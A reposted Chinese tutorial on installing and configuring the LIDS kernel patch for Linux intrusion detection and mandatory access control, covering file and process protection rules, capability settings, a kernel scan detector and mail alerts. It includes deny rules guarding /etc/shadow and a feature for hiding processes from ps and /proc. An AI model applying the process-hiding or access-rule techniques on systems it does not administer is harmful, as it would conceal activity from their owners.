[转载]LIDS
信息来源:ITS SecurityTeam目 录
LIDS
快速入门
特性
安装
配置
实例
使用手册
介绍
安装
配置
测试
功能测试
漏洞测试
附录
原理分析
保护文件
保护设备
保护重要进程
密封内核
Capability
LIDS在内核中的安全级别
网络安全
入侵响应系统
--------------------------------------------------------------------------------
LIDS
LIDS( Linux入侵侦察系统)是Linux内核补丁和系统管理员工具(lidsadm),它加强了Linus内核。 它在内核中实现了一种安全模式 -- 参考模式以及内核中的Mandatory Access Control(命令进入控制)模式。本文将阐述LIDS的功能和如何使用它来建立一个安全的Linux系统。
[目录]
--------------------------------------------------------------------------------
快速入门
[目录]
--------------------------------------------------------------------------------
特性
1. 为什么选择LIDS
随着互连网上Linux越来越受欢迎 ,越来越多现有GNU/LINUX系统上的应用软件中的安全
漏洞被发现。很多程序利用了程序员的粗心,例如缓存溢出、格式化代码攻击。当系统安全
受到程序的危及,黑客获得ROOT权限以后,整个系统将被入侵者控制。
由于代码的开放性,我们可以获得很多所希望Linux应用程序的原代码,并且根据我们的
需要来修改。所以bug能很容易地被找到,并很快修补。但是当漏洞被揭示后,而系统管理员
疏于给漏洞打补丁,从而造成很容易地就被入侵,更糟的是黑客能获得ROOT SHELL。利用现
有的GNU/Linux系统,他为所欲为。这正是LIDS想要解决的问题。
首先看看现有的GNU/Linux系统存在哪些问题。
文件系统未受到保护
系统中的很多重要的文件,例如 /bin/login,一旦黑客入侵后,他可以上传修改过的l
ogin文件来代替/bin/login ,然后他就可以不需要任何登陆名和密码就登陆系统。这常被称
为Trojan house。
进程未受到保护
系统上运行的进程是为某些系统功能所服务的,例如HTTPD是一个web服务器来满足远程
客户端对于web的需求。作为web服务器系统,保护其进程不被非法终止是很重要的。但是当
入侵者获得了ROOT权限后,我们却无能为力。
系统管理未受保护
很多系统管理,例如,模块的装载/卸载,路由的设置,防火墙的规则,能很容易就被修
改,如果用户的ID是0。所以当入侵者获得ROOT权限后,就变得很不安全。
超级用户(root)作为ROOT可能滥用权限
他可以为所欲为。作为ROOT他甚至可以对现有的权限进行修改。
综上所述,我们发现在现有的Linux系统中的进入控制模式是不足以建立一个安全的Linu
x系统。我们必须在系统中添加新的模式来解决这些问题。这就是LIDS所要做的。
2. LIDS的特色
Linux入侵侦察系统是Linux内核补丁和系统管理员工具,它加强了内核的安全性。它在
内核中实现了参考监听模式以及Mandatory Access Control(命令进入控制)模式。当它起
作用后,选择文件进入,每一个系统/网络的管理操作,任何使用权限, raw device, mem
和 I/O 进入将可以禁止甚至对于ROOT也一样。它使用和扩展了系统的功能,在整个系统上
绑定控制设置,在内核中添加网络和文件系统的安全特性,从而加强了安全性。你可以在线
调整安全保护,隐藏敏感进程,通过网络接受安全警告等等。
简而言之,LIDS提供了保护、侦察、响应的功能,从而是LINUX系统内核中的安全模式得
以实现。
2.1 保护
LIDS提供以下的保护 :
保护硬盘上任何类型的重要文件和目录,任何人包括ROOT都无法改变。
能保护重要进程不被终止
能防止非法程序的RAW IO 操作。保护硬盘,包括MBR保护,等等。
能保护系统中的敏感文件,防止未被授权者(包括ROOT)和未被授权的程序进入。
2.2 侦察
当有人扫描你的主机, LIDS能侦察到并报告系统管理员。 LIDS也可以检测到系统上任
何违法规则的进程。
2.3 响应
当有人违反规则, LIDS会将非法的运作细节记录到受LIDS保护的系统log文件中。 LID
S还可以将log信息传到你的信箱中。LIDS也可以马上关闭与用户的对话。
[目录]
--------------------------------------------------------------------------------
安装
1 下载LIDS补丁和相关正式的Linux内核
可以从LIDS Home,LIDS Ftp Home或最近的LIDS Mirror获得LIDS补丁和系统管理工具。
补丁名称是lids-x.xx-y.y.y.tar.gz, x.xx代表lids的版本, y.y.y代表Linux内核版本.例如, lids-0.9.9-2.2.17.tar.gz代表lids 版本是0.9.9 以及相关的内核版本是2.2.17.。
必须下载相关的内核版本。例如,你下载了lids-0.9.9-2.2.17.tar.gz,那你就应该下载inux内核2.2.17的原代码。可以从Kernel FTP Site或其他镜象获得内核原码。
然后,将内核原码和LIDS tar解压.例如,从 [url]www.lids.org[/url]得到lids-0.9.9-.2.17.tar.gz,从ftp.us.kernel.org得到linux-2.2.17.tar.bz2后:
-----------------------------------------------------------
1. uncompress the Linux kernel source code tree.
# cd linux_install_path/
# bzip2 -cd linux-2.2.17.tar.bz2 | tar -xvf -
2. uncompress the lids source code and install the lidsadm tool.
# cd lids_install_path
# tar -zxvf lids-0.9.8-2.2.17.tar.gz
-----------------------------------------------------------
2 在正式的linux内核上打LIDS补丁
Linux内核原码打LIDS补丁
-----------------------------------------------------------
# cd linux_install_path/linux
# patch -p1
/* link the default source path to lids patched version
# rm -rf /usr/src/linux
# ln -s linux_install_patch/linux /usr/src/linux
3 配置Linux内核
-----------------------------------------------------------
configure the Linux kernel
# cd linux
# make menuconfig or make xconfig
-----------------------------------------------------------
现在,配置Linux内核,按照以下步骤实施:
[*] Prompt for development and/or incomplete code/drivers
[*] Sysctl support
After that, you will find that a new item appear in the bottom of the configura
tion menu name "Linux Intrusion Detection System". Entering this menu, turn the
[*] Linux Intrusion Detection System support (EXPERIMENTAL) (NEW).
配置LIDS内核以后.退出配置界面,编译内核。
# make dep
# make clean
# make bzImage
# make modules
# make modules_install
3.4 在Linux系统上安装LIDS和系统管理工具
复制 bzImage 到 /boot/ ,编辑 /etc/lilo.conf
-----------------------------------------------------------
# cp arch/i386/boot/bzImage /boot/bzImage-lids-0.9.9-2.2.17
/* build admin tools */
# cd lids-0.9.8-2.2.17/lidsadm-0.9.8/
# make
# make install
# less /etc/lilo.conf
boot=/dev/hda
map=/boot/map
install=/boot/boot.b
prompt
timeout=50
default=linux
image=/boot/vmlinuz-2.2.16-3
label=linux
read-only
root=/dev/hda2
image=/boot/bzImage-lids-0.9.9-2.2.17
label=dev
read-only
root=/dev/hda2
-----------------------------------------------------------
运行/sbin/lilo 来安装新内核
# /sbin/lilo
5 配置LIDS系统
在重新启动以前,必须配置lids系统,使其符合你的安全需要.你可以定义受保护的文件,受保护的进程等等。
缺省情况下,lidsadm将把缺省配置文件安装到 /etc/lids/。你必须根据自己的需要重新配。首先,可以更新缺省lids.conf的inode/dev值。
# /sbin/lidsadm -U
6 重新启动系统
配置完Linux系统后,重新启动.当lilo出现时,选择装载the lids enable kernel。然后,你就将进入美妙的LIDS世界。
7 封装内核
系统启动后,不要忘记用lidsadm封装内核,在最后/etc/rc.local加入以下命令
# /sbin/lidsadm -I
8 在线管理
封装完内核后,你的系统就处于LIDS的保护下。可以做一些测试来验证,如果想改变某些配置,例如修改权限,可以通过输入密码方式在线改变lids的安全等级。
# /sbin/lidsadm -S -- -LIDS
改变lids配置属性后,例如lids.conf,lids.cap,你可以通过以下命令在内核中重新装载配置文件
# /sbin/lidsadm -S -- +RELOAD_CONF
[目录]
--------------------------------------------------------------------------------
配置
1 LIDS配置目录 -- “/etc/lids/”
安装 lidsadm以后,在/etc/lids/下会产生一个 lids配置目录,当内核启动时,配置信息将被读入内核中来初始化 LIDS系统。
·lids.conf 这是用来储存 LIDS ACLs信息的文件。它包括定义事件进入类型的ACLs.其项目可以用lidsadm来添加或删除。
·lids.cap 这个文件包括了系统中所有的权限,可以通过编辑它来配置系统中启动或禁止的权限。在想要启动的名称前设置 "+"或设置 "-"来禁止。安装系统时, lids.cap 以缺省值存在,应该按照自己的需要改变它。
·lids.net 这个文件是用来配置通过网络传送警告信件的。可以定义 SMTP服务器、端口、信息题目等等。
这一文件需要在配置内核时选择:
[*] Send security alerts through network (NEW)
lids.pw 这是用来储存由"lidsadm -P"产生的密码的文件,需要在配置内核时选择:
[*] Allow switching LIDS protections (NEW)
注意: 如果要改变lids保护等级,你必须在重新启动内核前运行"lidsadm -P"l.
2 保护文件和目录
首先,要决定哪些文件需要受保护。建议你应该保护系统二进制文件和系统配置文件,
例如/usr/,/sbin/,/etc/,/var/log/。
其次,要决定保护文件的方式. LIDS提供四种保护类型:
DENY access to any body(禁止任何人进入)。
这种方式意味着没有人能够看见或修改文件或目录. 最敏感的文件应该配置为DENY。 例
如,可以将 /etc/shadow设置为 DENY access to anybody,
-------------------------------------------------------
Usage
lidsadm -A -o file_to_protected -j DENY
# lidsadm -A -o /etc/shadow -j DENY
After reboot or RELOAD the configurate files. you can see,
# ls /etc/shadow
ls: /etc/shadow: No such file or directory
-------------------------------------------------------
然后, 你要设置一些可以进入文件的程序,例如,登陆系统时,/bin/login文件需要从
受保护的文件/etc/shadow里读取密码 ,但/etc/shadow不允许任何人进入,所以你应该:
-------------------------------------------------------
Usage
lidsadm -A -s SUBJECT_PROGRAM -o OBJECT_PROGRAM -j READ/WRITE/APPEND
# lidsadm -A -s /bin/login -o /etc/shadow -j READ
-------------------------------------------------------
配置生效后,你可以登陆到系统上但无法进入/etc/shadow。这是MAC (mandatory acce
ss control命令进入控制)的一个实例。
Read Only Files(只读文件)
这种方式意味着没有人可以改变文件,建议/etc/passwd,/bin/passwd等类似文件可以
采取这种方式。
-------------------------------------------------------
lidsadm -A -o file_to_protect -j READ
example,
1. to protect the whole /sbin/ as read-only.
# /sbin/lidsadm -A -o /sbin/ -j READ
2. to protect /etc/passwd as read-only
# /sbin/lidsadm -A -o /etc/passwd -j READ
-------------------------------------------------------
Append Only Files(只能添加文件)
大多此类文件是指系统的log文件,例如 /var/log/message ,/var/log/secure。 文件
只能添加而不能删除或修改以前的内容。
------------------------------------------------------
USAGE:
lidsadm -A -o filename_to_protect -j APPEND
example,
1. to protect the system log files
# /sbin/lidsadm -A -o /var/log/message -j APPEND
# /sbin/lidsadm -A -o /var/log/secure -j APPEND
2. to protect the apache httpd log files
# /sbin/lidsadm -A -o /etc/httpd/logs/ -j APPEND
-----------------------------------------------------
WRITE(可写)
此类型用于定义可以改写的文件。
Mandatory Access Control in file protection(文件保护中的命令进入控制)
定义哪个项目(程序)可以以哪种方式(READ,APPEND,WRITE)进入哪个目标(文件)。
例如,定义/home/httpd/为DENY to anybody然后让/usr/sbin/httpd能从目录中READ。
这样一来, Web服务器可以正常地作为公用WEB服务器,但在/home/httpd/下的内容和程序
是不可见的,也不能被修改。如果入侵者通过httpd的bug获得了root shell,他即使在root
shell下也不能看到文件,即使他可以通过改写堆栈在httpd服务器中插入危险的代码,他也
只能读到/home/httpd下的文件,而不能修改。
----------------------------------------------------
# lidsadm -A -o /home/httpd -j DENY
# lidsadm -A -s /usr/sbin/httpd -o /home/httpd -j READ
---------------------------------------------------
[目录]
--------------------------------------------------------------------------------
实例
实例
下面是LIDS HOWTO中的一个实例
---------------------------------------------------
lidsadm -Z
lidsadm -A -o /boot -j READ
lidsadm -A -o /vmlinuz -j READ
lidsadm -A -o /lib -j READ
lidsadm -A -o /root -j READ
lidsadm -A -o /etc -j READ
lidsadm -A -o /sbin -j READ
lidsadm -A -o /usr/sbin -j READ
lidsadm -A -o /bin -j READ
lidsadm -A -o /usr/bin -j READ
lidsadm -A -o /usr/lib -j READ
lidsadm -A -o /var/log -j APPEND
---------------------------------------------------
安装lidsadm后,在lidsadm包中会有一个样例lids.conf 存放于/etc/lids/下,你必须运行 "lidsadm -U"更新 inode/dev值,根据需要重新配置它。
4.3 保护进程
UN-killable process(不可杀进程)
LIDS 可以保护进程当其父程序初始化时(pid=1)[ the process whose parent is init(pid=1)]必须配置权限 (/etc/lids/lids.cap),如下:
-29:CAP_INIT_KILL
hidden process(隐藏进程)
由于进程被隐藏, 所以当进程启动时,任何人用 "ps"命令或在"/proc"下都无法找到
.
--------------------------------------------------
example,
lidsadm -A -s /usr/sbin/httpd -t -o CAP_HIDDEN -j INHERIT
--------------------------------------------------
4.4 权限保护
Capabilities类似于赋予进程的权限, root方式拥有所有权限,但存在权限绑定设置。在普通的内核中,当你从绑定设置中删除一个权限,再也没有人可以使用它了,直到下次重新启动。 (关于普通使用可以参考[url]http://www.netcom.com/[/url] spoon/lcap)。
LIDS修改这一属性,使你可以任意转换。进入/proc/sys/kernel/cap_bset被捕获后引发安全警报,lidsadm承担所有这些工作。
可以通过运行lidsadm列出所有的LIDS权限,和每一权限确切的含义。
系统权限配置
系统权限属性存放于/etc/lids/lids.cap,必须编辑此文件来适应你的需要。
这里,我们讨论其中的两个属性:
CAP_SYS_RAWIO 启用这一权限,我们可以
allow ioperm/iopl and /dev/port access,
allow /dev/mem and /dev/kmem access and
allow raw block devices (/dev/[sh]d??) access
当禁止了这项功能以后,可以使得系统上所有进程失去对于raw device的权限,例如运行lilo。
但是一些进程需要此权限来打开,例如XF86_SVGA, 所以在编译内核的时候, 使一些程序处于例外状态。
CAP_NET_ADMIN 这个项目可以得到以下权限
interface configuration
administration of IP firewall, masquerading and accounting
setting debug option on sockets
modification of routing tables
setting arbitrary process / process group ownership on sockets
binding to any address for transparent proxying
setting TOS (type of service)
setting promiscuous mode
clearing driver statistics
multicasting
read/write of device-specific registers
出于安全因素,应该禁止此项目来禁止改变网络配置。当其被禁止后,防火墙规则将不允许被改变。
配置lids.cap
可以在capability name前加 "+"或"-"来启动或禁止权限。
--------------------------------------------------
### 0: In a system with the _POSIX_CHOWN_RESTRICTED option defined, this overri
des the restriction
### 0: of changing file ownership and group ownership.
#
-0:CAP_CHOWN
### 1: Override all DAC access, including ACL execute access if _POSIX_ACL is d
efined. Excluding
### 1: DAC access covered by CAP_LINUX_IMMUTABLE.
#
+1:CAP_DAC_OVERRIDE
---------------------------------------------------
以上例子演示了禁止CAP_CHOWN (-),启动CAP_DAC_OVERRIDE(+),应该仔细检查lids.cap文件来决定哪些需要启动哪些需要禁止。
用capabilities为独立进程分类
你可以使用capability为独立进程分类,从而使得进程可以做到一些系统所禁止的事情。
例如,你可以在/etc/lids/lids.cap下禁止CAP_SYS_RAWIO(-),但你仍然需要使用X服务,所以你可以:
# lidsadm -A -s /usr/X11R6/bin/XF86_SVGA -t -o CAP_SYS_RAWIO -j INHERIT
使得XF86_SVGA拥有CA_SYS_RAWIO的权限,而其他程序不能获得CAP_SYS_RAWIO。
封装内核
启动内核以后,系统权限要在封装内核以后才会起作用。你必须将以下命令加入RefHat系统的/etc/rc.d/rc.local下,或其他系统的启动初始文件中
#/sbin/lidsadm -I
4.5 网络安全
LIDS提供了加强网络安全的功能。
基于capability的网络安全
通过capability,可以加强网络安全性。比如anti snifferring,不能绑定低于1024的端口,不能改变防火墙和路由器规则。所以,建议仔细阅读每一项capability.
内核中的扫描检测器
LIDS提供了一个内核扫描检测器,用来侦察是否有人在扫描你的系统。这个扫描器可以侦察到half-open scan, SYN stealth port scan, Stealth FIN, Xmas,或是Null scan等等, 象nmap,satan等工具都能被检测到。
当raw socket被禁止时,它会起作用。这样一来,一些基于监听上的user space detector不起作用。并且这一检测器不使用任何socket,比任何user space detector要安全。
如果想要启用这项功能,可以在编译内核的时候选择。
4.6 入侵响应系统
当LIDS检测到违反已定义规则时,它可以用以下方式回应。
记录信息
当有人违反规则, lids_security_log将把信息记录下来, 记录也具有anti_logging_flood的能力,可以在编译内核时设置。
通过mail服务器记录信息
LIDS的新功能可以把信息传输到你的信箱。你可以在/etc/lids/lids.net下定义邮件服务器IP,外来邮件地址等等。
样例
-----------------------------------------------------
MAIL_SWITCH=1
# MAIL_RELAY=hex IP:port
# IP11.1 of the machine that will be directly connected by LIDS
# for relaying its mails. Port is usually 25, but who knows...
MAIL_RELAY=210.73.88.149:25
# MAIL_SOURCE=source machine :
# Name of the source machine, used for the ehlo identification.
# Note that a bad name here could make the mail relay refuse your
# mails.
MAIL_SOURCE=lids.chinacluster.com
-----------------------------------------------------
此例中,SMTP服务器是210.73.88.149,端口25.邮件资源用于EHLO identification。
控制台的挂起
当用户违反规则,控制台将关闭用户的控制台。
[目录]
--------------------------------------------------------------------------------
使用手册
[目录]
--------------------------------------------------------------------------------
介绍
LIDS是Linux下的入侵检测和防护系统,是linux内核的补丁和安全管理工具,它增强了内核的安全性,它在内核中实现了参考监听模式以及强制访问控制(Mandatory Access Control)模式。
LIDS主要功能:
·保护:保护硬盘上任何类型的重要文件和目录,如/bin、/sbin、/usr/bin、/usr/sbin、/etc/rc.d等目录和其下的文件,以及系统中的敏感文件,如passwd和shadow文件,防止未被授权者(包括ROOT)和未被授权的程序进入,任何人包括ROOT都无法改变,文件可以隐藏。 保护重要进程不被终止,任何人包括root也不能杀死进程,而且可以隐藏特定的进程。防止非法程序的RAW IO 操作,保护硬盘,包括MBR保护等等。
·检测:集成在内核中的端口扫描器,LIDS能检测到扫描并报告系统管理员。 LIDS还可以检测到系统上任何违反规则的进程。
·响应:来自内核的安全警告,当有人违反规则时, LIDS会在控制台显示警告信息,将非法的活动细节记录到受LIDS保护的系统log文件中。 LIDS还可以将log信息发到你的信箱中。LIDS还可以马上关闭与用户的会话。
[目录]
--------------------------------------------------------------------------------
安装
1.下载必须文件,linux内核源码包和lids包,然后解压
# cd linux_install_path/
# bzip2 -cd linux-2.4.16.tar.bz2 | tar -xvf -
# cd lids_install_path
# tar -zxvf lids-1.1.0-2.4.16.tar.gz
2.在linux的内核打LIDS补丁,然后配置和编译linux内核,安装LIDS系统
# cd linux_install_path/linux
# patch -p1 < lids_install_path/lids-version-linversion.patch
# rm -rf /usr/src/linux
# ln -s linux_install_patch/linux /usr/src/linux
# cd /usr/src/linux
# make menuconfig or make xconfig
[*] Prompt for development and/or incomplete code/drivers
[*] Sysctl support
[*] Linux Intrusion Detection System support (EXPERIMENTAL) (NEW).
[ ] Hang up console when raising a security alert
当收到一个安全警告挂起控制台
[ ] Security alert when execing unprotected programs before sealing LIDS
当执行没有受LIDS保护的程序时发送安全警告
[ ] Do not execute unprotected programs before sealing LIDS
在安装LIDS前不执行没有受保护的程序
[ ] Try not to flood logs
尽量不要让日志溢出
[ ] Allow switching LIDS protections
允许转换LIDS保护
[ ] Allow remote users to switch LIDS protections
允许远程用户来转换LIDS保护
[ ] Allow any program to switch LIDS protections
允许任何程序来转换LIDS保护
[ ] Allow reloading config. file
允许重新引导配置文件
[ ] Port Scanner Detector in kernel
内核的端口扫描器
[ ] Send security alerts through network
通过网络发送安全警告
[ ] Hide klids kernel thread
隐藏内核进程
[ ] Use generic mailer pseudo-script
使用通用的邮件发送脚本
根据需要选择相应的选项,配置支持LIDS的内核以后.退出配置界面,编译内核。
# make dep
# make clean
# make bzImage
# make modules
# make modules_install
复制 bzImage 到 /boot/ ,编辑 /etc/lilo.conf
# cp arch/i386/boot/bzImage /boot/bzImage-lids
安装lids管理工具
# cd lids-1.1.0-2.4.16/lidsadm-1.1.0/
# make
# make install
# vi /etc/lilo.conf
boot=/dev/hda
map=/boot/map
install=/boot/boot.b
prompt
timeout=50
default=lids
image=/boot/vmlinuz-2.4.16
label=linux
read-only
root=/dev/hda2
image=/boot/bzImage-lids
label=lids
read-only
root=/dev/hda2
运行/sbin/lilo 来安装新内核
# /sbin/lilo
[目录]
--------------------------------------------------------------------------------
配置
必须配置lids系统,使其符合你的安全需要.你可以定义受保护的文件,受保护的进程等等。
首先,更新缺省lids.conf的inode/dev值。
# /sbin/lidsadm -U
然后,获得一个RipeMD-160加密口令:
# /sbin/lidsadm -P
缺省情况下,lidsadm将把缺省配置文件安装到 /etc/lids/。你必须根据自己的需要重新配置。
当内核启动时,配置信息就把相关信息读入内核来初始化LIDS系统。
lids.conf: 这个文件用来存储LIDS ACLs信息。它包括定义对象访问类型的ACLs。
lids.cap:这个文件包括系统的所有性能,可以编辑这个文件来配置这些性能。
lids.net:这个文件用来配置发给管理员信箱的警告信息。你可以定义SMTP服务器、端口、消头等。仅在配置内核时,选择了[*] Send security alerts through network (NEW)才有该文件。
lids.pw:这个文件存储由'lidsadm -P'命令生成的密码文件。配置内核时选择[*] Allow switching LIDS protections , 就必须有该文件。
1.配置LIDS保护的文件和目录
首先,确定要保护哪些文件。一般情况下,保护系统二进制文件和系统配置文件,
比如:/bin,/sbin/,/usr/,/etc/,/var/log/。
其次,决定以什么方式来保护文件。LIDS提供四种保护类型。
a.拒绝任何人访问
带有DENY标志的文件和目录没有人能够看见,也不能修改。那些非常敏感的文件应该加上DENY标志。例如,/etc/shadow文件。
---------------------------------------------------------------------------
用法:
lidsconf -A -o file_to_protected -j DENY
# lidsconf -A -o /etc/shadow -j DENY
重启或重新加载配置文件后,你会看到:
# ls /etc/shadow
ls: /etc/shadow: No such file or directory
---------------------------------------------------------------------------
接下来,还需要一些设置使一些特有的程序能够访问这些文件,比如,登录到系统的时候,/bin/login文件需要从有DENY标记的/etc/shadow文件中读密码。
---------------------------------------------------------------------------
用法:
lidsconf -A -s SUBJECT_PROGRAM -o OBJECT_PROGRAM -j READONLY/WRITE/APPEND
# lidsconf -A -s /bin/login -o /etc/shadow -j READONLY
---------------------------------------------------------------------------
当你配置好而且重启系统或重新加载配置文件后,你可以登录进系统,但不能看到/etc/shadow。这就是强制访问控制的一个例子。
b.只读文件
任何用户不能改变带有只读标记的文件。比如/etc/passwd,/bin/passwd文件一般属于此类。
---------------------------------------------------------------------------
用法:
lidsconf -A -o file_to_protect -j READONLY
例子:
1.保护整个/sbin/目录,使之只读。
# /sbin/lidsconf -A -o /sbin/ -j READONLY
2.保护/etc/passwd文件为只读
# /sbin/lidsconf -A -o /etc/passwd -j READONLY
---------------------------------------------------------------------------
c.只能追加的文件
一般来说,系统日志文件应定义成此类。比如,/var/log/message,/var/log/secure。这些文件只能以追加的模式打开,用户不能修改前面的部分。
---------------------------------------------------------------------------
用法:
lidsconf -A -o filename_to_protect -j APPEND
例子:
1.保护系统日志文件
# /sbin/lidsconf -A -o /var/log/message -j APPEND
# /sbin/lidsconf -A -o /var/log/secure -j APPEND
2.保护apache httpd日志文件
# /sbin/lidsconf -A -o /var/log/httpd -j APPEND
---------------------------------------------------------------------------
d.可写文件
以上READONLY,APPEND,WRITE属于LIDS对文件采取的强制访问控制(MAC)。
通过LIDS的这个功能,就可以定义哪个程序可以对哪个文件采取什么样的访问模式。比如,定义/home/httpd/对任何人DENY,并且定义/usr/sbin/httpd能够从所在目录READONLY。在这种情况下,Web服务器像一般的Web服务器一样,只是在/home/httpd/目录下的内容和程序不能被看到和修改。即使入侵者利用httpd的漏洞获得了ROOT权限,他也看不到在root shell里面的文件。即使他重写缓冲区,在httpd 服务器中加入一些病毒代码,他也只能读出/home/httpd下面的文件而实质上无法修改它们。
---------------------------------------------------------------------------
# lidsconf -A -o /home/httpd -j DENY
# lidsconf -A -s /usr/sbin/httpd -o /home/httpd -j READONLY
---------------------------------------------------------------------------
一个简单配置的例子:
---------------------------------------------------------------------------
lidsconf -Z
lidsconf -A -o /boot -j READONLY
lidsconf -A -o /lib -j READONLY
lidsconf -A -o /root -j READONLY
lidsconf -A -o /etc -j READONLY
lidsconf -A -o /sbin -j READONLY
lidsconf -A -o /usr/sbin -j READONLY
lidsconf -A -o /bin -j READONLY
lidsconf -A -o /usr/bin -j READONLY
lidsconf -A -o /usr/lib -j READONLY
---------------------------------------------------------------------------
2.配置LIDS保护进程
a.不可杀死的进程
LIDS能够保护父进程是init(pid=1)的进程,按照下面的命令配置/etc/lids/lids.cap里面的性能:
-29:CAP_INIT_KILL
b.隐藏的进程
这些进程看不到,用ps命令或者在/proc里面也看不到。
---------------------------------------------------------------------------
例子:
lidsconf -A -s /usr/sbin/httpd -o CAP_HIDDEN -j GRANT
---------------------------------------------------------------------------
3.通过设置权限来保护
这里的权限就是你给一个进程的权限。一个root进程拥有所有的性能,还存在绑定的权限问题。在一般的内核中,当从绑定集中去掉一种权限时,除非重启任何人都不能启用该权限。LIDS修改权限使用户可以在这些权限中间任意切换。对/proc/sys/kernel/cap_bset的访问被俘获,引发安全告警。
系统的权限值存储在/etc/lids/lids.cap中。编辑它可以满足你的需求。
例如:
CAP_SYS_RAWIO项若打开,我们就可以允许访问/dev/port,/dev/mem,/dev/kmem,以及对原始块设备(/dev/[sh]d??)的访问。
当我们取消这个权限时,就可以使运行在系统上的所有进程不能访问原始块设备,比如运行lilo。但是,一些进程的运行需要这些权限,比如XF86_SVGA。
再比如,CAP_NET_ADMIN,这项权限可以得到以下的能力:接口配置,IP防火墙、伪装和计费的管理,设置sockets调试选项,修改路由表,设置任意进程或进程组对sockets的所有权,为透明proxy代理捆绑地址,设置服务类型,设置混合模式,多播,对设备的指定寄存器进行读写等。出于安全考虑,我们应当取消这项权限,不允许变化网络设置,也就禁止了防火墙规则的改变。
配置lids.cap文件的方法是在权限名字的前面设置"+"使它有效,或设置"-"取消它。
具体的功能说明:
CAP_CHOWN功能:
在一个_POSIX_CHOWN_RESTRICTED功能定义的系统。这会越过改变系统文件所有者和组所有的权限
CAP_DAC_OVERRIED功能:
如果_POSIX_ACL定义,就会越过所有的DAC访问,包括ACL执行访问,用CAP_LINUX_IMMUTABLE功能来排除DAC的访问
CAP_DAC_READ_SEARCH功能:
如果_POSIX_ACL定义,就会越过所有的DAC的读限制,并在所有的文件和目录里搜索,包括ACL限制。用CAP_LINUX_IMMUTABLE来限制DAC访问
CAP_FOWNER功能:
越过文件说有的允许限制,如文件的所有者ID必须和用户ID一样,除了CAP_FSETID可用。它不会越过MAC和DAC限制
CAP_FSETID功能:
越过当设置文件的S_ISUID和S_ISGID位的时候,用户的ID必须和所有者ID匹配的限制,设置S-ISGID位的时候,组ID必须和所有者ID匹配的限制,用chown来设置S_ISUID和S_ISGID为的功能限制
CAP_FS_MASK功能:
用来回应suser()或是fsuser()。
CAP_KILL功能:
一个有有效用户ID的进程发送信号时必须匹配有效用户ID的功能会越过
CAP_SETGID功能:
允许setgid() 功能, 允许setgroups() 允许在socket里伪造gid
CAP_SETUID功能:
允许set*uid()功能 允许伪造pid在socket
CAP_SETPCAP功能:
把所有的许可给所有的pid。或是把所有的许可删除
CAP_LINUX_IMMUTABLE功能:
允许更改S_IMMUTABLE和S_APPEND文件属性
CAP_NET_BIND_SERVICE功能:
允许绑定1024下的TCP/UDP套接字
CAP_NET_BROADCAST功能:
允许广播,监听多点传送
CAP_NET_ADMIN功能:
允许配置接口
允许管理IP防火墙IP伪装和帐户
允许配置socket调试选项
允许修改路由表
允许配置socket上的进程的组属性
允许绑定所有地址的透明代理
允许配置TOS(服务类型)
允许配置混杂模式
允许清除驱动状态
允许多点传送
允许读或写系统记录
CAP_NET_RAW功能:
允许用RAW套接字
允许用PACKET套接字
CAP_IPC_LOCK功能:
允许琐定共享内存段
允许mlock和mlockall
CAP_IPC_OWNER功能:
越过IPC所有权检查
CAP_SYS_MODULE功能:
插入或删除内核模块
CAP_SYS_RAWIO功能:
允许ioperm/iopl和/dev/prot的访问
允许/dev/mem和/dev/kmem访问
允许块设备访问(/dev/[sh]d??)
CAP_SYS_CHROOT功能:
允许chroot()
CAP_SYS_PTRACE功能:
允许ptrace()任何进程
CAP_SYS_PACCT功能:
允许配置进程帐号
CAP_SYS_ADMIN功能:
允许配置安全钥匙
允许管理随机设备
允许设备管理
允许检查和配置磁盘限额
允许配置内核日志
允许配置域名
允许配置主机名
允许调用bdflush()命令
允许mount()和umount()命令
允许配置smb连接
允许root的ioctls
允许nfsservctl
允许VM86_REQUEST_IRQ
允许在alpha上读写pci配置
允许在mips上的irix_prctl
允许刷新所有的m68k缓存
允许删除semaphores
用CAP_CHOWN去代替"chown"IPC消息队列,标志和共享内存
允许锁定或是解锁共享内存段
允许开关swap
允许在socket伪装pids
允许设置块设备的缓存刷新
允许设置软盘驱动器
允许开关DMA开关
允许管理md设备
允许管理ide驱动
允许访问nvram设备
允许管理apm_bios,串口或是bttv电视设备
允许在isdn CAPI的驱动下生成命令
允许读取pci的非标准配置
允许DDI调试ioctl
允许发送qic-117命令
允许启动或禁止SCSI的控制和发送SCSI命令 允许配置加密口令在回路文件系统上
CAP_SYS_BOOT功能:
允许用reboot() 命令
CAP_SYS_NICE功能:
允许提高或设置其他进程的优先权
允许在自己的进程用FISO和实时的安排和配置
CAP_SYS_RESOURCE功能:
越过资源限制,设置资源限制
越过配额限制
越过保留的ext2文件系统
允许大于64hz的实时时钟中断
越过最大数目的控制终端
越过最大数目的键
CAP_SYS_TIME功能:
允许处理系统时钟
允许_stime
允许设置实时时钟
CAP_SYS_TTY_CONFIG功能:
允许配置终端设备
允许vhangup()终端
另外,还可以用权限标记专用进程。标记进程的权限使进程具备系统禁止的性能。
例如,在文件lids.cap中取消CAP_SYS_RAWIO权限,但是你需要在启动X Server的时候具备这个权限。所以,可以这样设置:
# lidsconf -A -s /usr/X11R6/bin/XF86_SVGA -o CAP_SYS_RAWIO -j GRANT
使XF86_SVGA具备CAP_SYS_RAWIO,而其它的程序不能得到CAP_SYS_RAWIO。
所以要选择需要删除的功能:
必须删除CAP_SYS_MODULE, CAP_SYS_RAWIO 和 CAP_SYS_ADMIN来保护系统不受小的系统攻击。最好也要禁止CAP_NET_ADMIN, CAP_SYS_PTRACE, CAP_LINUX_IMMUTABLE, CAP_KILL, CAP_SYS_RESOURCE, CAP_SYS_TIME 和 CAP_SYS_TTY_CONFIG
LIDS通过权限设置来提高网络安全性,比如反sniferring,禁止捆绑1024以下的端口,禁止改变防火墙和路由规则。
4.内核扫描检测
LIDS在内核中提供扫描监测器,检测谁正在扫描你的系统。它能够检测出half-open扫描,SYN秘密扫描,秘密FIN,Xmas或NULL扫描等,像nmap,satan这样的流行扫描工具可以被检测到。
即使原始套接口不能工作时它仍能起作用,因为它不用任何套接口。在这种情况下,一些基于sniffering的用户检测器不能工作了。若想要利用LIDS的这项功能,在编译内核时选上就可以了。
5.入侵响应系统
当LIDS检测到违背定义的规则的活动时,可以做出下列响应:
a.记录相关信息。
当某人破坏这些规则时,lids_security_log记录相关信息,记录工作同样具有anti_logging_flood的能力。编译内核时你可以设置这个选项。
b.通过mail服务器记录信息。
LIDS可以把日志送到你的信箱里面去。你可以在/etc/lids/lids.net中定义邮件服务器的IP,出口邮件的地址等。
如下:
---------------------------------------------------------------------------
